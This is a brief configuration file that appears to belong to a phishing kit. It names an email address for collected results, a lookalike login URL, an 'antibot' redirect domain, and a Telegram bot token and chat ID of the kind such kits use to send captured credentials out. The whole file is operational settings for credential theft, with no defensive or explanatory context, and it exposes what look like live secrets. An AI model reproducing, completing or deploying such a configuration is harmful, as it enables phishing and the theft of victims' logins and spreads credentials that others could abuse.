MAIL_RESULT=jacksrodney@yandex.com
LINK_URL=https://login.kmcfilsonsolution.com/FwaPhpjB
LINK_ANTIBOT=https://documencompany.takimrisowes.online/login/
TOKEN=6128426337:AAGxCph2vxw0YFDV1cW3OKVa9LKbsm8JsT8
CHAT_ID=1677531337
